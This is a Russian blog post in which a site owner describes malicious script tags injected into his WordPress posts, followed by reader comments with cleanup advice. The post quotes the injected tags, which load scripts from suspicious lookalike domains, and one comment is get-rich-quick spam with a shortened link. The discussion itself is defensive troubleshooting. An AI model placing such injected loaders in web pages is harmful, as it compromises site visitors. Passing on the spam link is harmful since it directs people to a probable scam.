Заработок в интернете, обзор партнерских программ, гэмблинг.

Вредоносный код на сайтах Вордпресс

Добавлено | Сентябрь 29, 2015 | 8 комментариев

Всем привет. Началось все месяца 3 назад, лето, когда мои сайты еще лежали на хостингах. Решил подредактировать старые записи на одном из сайтов и заметил в коде вот такой скрипт (сразу несколько вариаций, на разных сайтах был разный код, немного подредактировал):

script src=//shareup.ru/social. js>script
script src=//css. googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2>script
script type=text/javascript src=//uptoliked.ru/widjets. js>script

Код оказался в каждой записи и на каждой страницы, вставлен рандомно в разные места.
Почистил все записи через замену в БД, сейчас вот узнал про плагин, который ищет и делает автозамену во всех записях и страницах, плагин — search regex. В общем, сменил тогда все пароли в админке, пароли к БД, обновил все движки и плагины, перенес сайты на ВПС. Причем тогда только на одном хостинге пострадали сайты, на втором было все нормально. Проделав все это, я успокоился, до сегодняшнего дня…

Сегодня вновь обнаружил эти коды, где-то на 7 из 10 сайтов, причем коды были вставлены даже на новых сайтах, где стоит только админка и нет никаких плагинов и эти сайты не лежали раньше на моем хосте! Т.е. версия, что коды идут через плагины, думаю, отпадает. Определенно как-то это все проникает через запросы к БД, но как? Ведь пароли стоят новые — генерированные. Написал в поддержку ВПС, там подтвердили факт наличия такой беды у меня, но помочь не смогли, сказали, что надо включать бинарный лог mysql, но это будет писаться каждый запрос к БД каждого сайта и эти логи будут гигабайтных размеров.

Мыслей как избавиться нет, да и не очень понятно что делают эти коды, что-то определенно они подгружают… А вот как они сами подгружаются? Люди добрые, подскажите как эта дрянь может проникать и как ее убить раз и навсегда?

Чтобы получать актуальную информацию не забывайте подписываться на мою RSS рассылку!

Блог находят по запросам:

Комментарии

8 комментариев для “Вредоносный код на сайтах Вордпресс”

  1. Doorwaymoney
    Сентябрь 30th, 2015 @ 00:23

    Ну значит есть доступ к БД.
    Скорее всего шелы залиты и через них «бомбят».
    Скачай Ai-bolit, сделай полную проверку сайтов.

    Если что-то найдешь — то вырубаешь все сайты и начинаешь — смена root на сервак, смена ftp на сервак и т.д.
    Для каждого сайта:
    — чистка файлов/бд от вирусни;
    — смена пароля к БД;
    — смена пароля к админу в WP;
    … следующий сайт

    Должно помочь, но если не поможет — значит есть какая-то дырка: плагины/настройки VPS и ХЗ что… Которую просто так не найдешь. Меняешь хостера и переносишь часть сайтов с чисткой.

    Ну если и это не поможет — то снос плагинов.

  2. seoonly.ru
    Сентябрь 30th, 2015 @ 07:07

    А сейчас какая версия WP стоит? Может с правами на папки с папкой с темой сайта проблемы?

    644 попробовать выставить можно

  3. admin
    Сентябрь 30th, 2015 @ 11:53

    Ай-болит и антивирь от Яндекса ничего не находят, пароли к БД и прочему менял, версия ВП самая последняя. Тут дело в том, что давно взломали и код я не удалил, он походу в каком-то файле прописался системном, потом на новом впс заразил и другие сайты. Надо этот код в файлах искать. Парень один обещал помочь, говорит уже убивал эту херь…

  4. misecondi
    Сентябрь 30th, 2015 @ 12:37

    Сноси все, устанавливай на чистый двиг и подключай к старой бд. Пока пробуй на новую тему (можно дефолтную оставить), чтобы протестировать, потом можно свою вернуть (лучше, если есть из бекапа, пока сайт был чистым).
    Хостер, кстати говоря, тут ни при чем, как выяснилось)), но это я так к слову пришлось…

  5. MoneyMakerClub.Net
    Сентябрь 30th, 2015 @ 13:33

    В последнее время активизировались подборы паролей. У меня прям сервак ложили подборщики. А если один раз подобрали, то залили куда нибудь шелл и теперь хоть меняй пароль, хоть нет без разницы. Скачай б/д сайта, скачай файлы загруженные и переустанови движок с нуля, потом восстанови б/д и внимательно просмотрев файлы залей назад. Ну пароли все поменять это само собой.

  6. asdf
    Сентябрь 30th, 2015 @ 13:59

    Возможно в файлах тем есть что-то не хорошее.

  7. LarisaVew
    Октябрь 3rd, 2015 @ 09:34

    ПЕРВЫЙ И ПОКА ЧТО ЕДИНСТВЕННЫЙ В СТРАНАХ СНГ АВТОМАТИЧЕСКИЙ МЕХАНИЗМ КОТОРЫЙ ПРИНОСИТ 5 670 РУБЛЕЙ ЕЖЕДНЕВНО ВСЕГО ЗА ДВА ДЕЙСТВИЯ КОТОРЫЕ ЗАЙМУТ МАКСИМУМ 10 МИНУТ! http://bit.ly/1GpuH4C

  8. Александр
    Ноябрь 23rd, 2016 @ 08:37

    Тоже столкнулся с такой проблемой, при переписке с хостером выяснилось следующее
    «Как нам удалось выяснить, данные вставки кода были добавлены посредством уязвимости самой CMS WordPress, которая была устранена в версии 4.2.4.»
    Соответственно что бы от этого избавиться нужно как минимум чистить БД от этого скрипта и менять пароли везде где можно.

Форма комментирования





Наверх
Вверх